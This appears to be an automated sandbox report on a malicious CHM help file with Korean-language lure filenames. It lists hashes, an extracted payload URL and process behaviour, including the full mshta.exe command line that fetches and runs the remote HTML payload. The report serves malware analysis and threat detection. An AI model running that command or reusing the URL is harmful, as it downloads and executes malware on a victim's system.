Analysis
max time kernel: 146s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64 arch:x86 image:win10v2004-20230220-en locale:en-us os:windows10-2004-x64 system
submitted: 21-03-2023 23:17
Behavioral task
behavioral1
Sample
(20220120)2022 - 001.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
(20220120)2022 - 001.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win10v2004-20230220-en
General
Target: (20220120)2022 - 001.chm
Size: 331KB
MD5
914521cb6b4846b2c0e85588d5224ba2
SHA1
9171d8b916637bd4b1b4348c1744d8f25a2363c6
SHA256
a88dc9a152cc7758a1df5aa33cf7b31cdb14e593a8744f2059602a49b8b04e0f
SHA512
cfc3f84a08213f8a1883f0ca6164067e4dfa59d8655e0c2f0fcba0bf985555bb0dca00b5eae0bfaa9ad6861736e9dfe57af490faeb53553d60c460a51d3233c8
SSDEEP
6144:tWVDblCou9OdcHSgSLaCjPjjaZL4annWryMGfdnSavw/5q/Rhc/UVkRJU1yq9i8y:uM3W0jSL3n4F5nlLW+ye/y
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
Blocklisted process makes network request (1 IoCs)
Processes: mshta.exe
flow  pid   process
10    3620  mshta.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: hh.exe
pid   process
3760  hh.exe
3760  hh.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Processes: hh.exe
description                          pid   process  target process
PID 3760 wrote to memory of 3620     3760  hh.exe   mshta.exe
PID 3760 wrote to memory of 3620     3760  hh.exe   mshta.exe
Processes
C:\Windows\hh.exe
"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\(20220120)2022 - 001.chm"
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
  C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/10.html ,
  - Blocklisted process makes network request
Downloads
memory/3760-140-0x00000201AA970000-0x00000201AAE27000-memory.dmp
Filesize: 4.7MB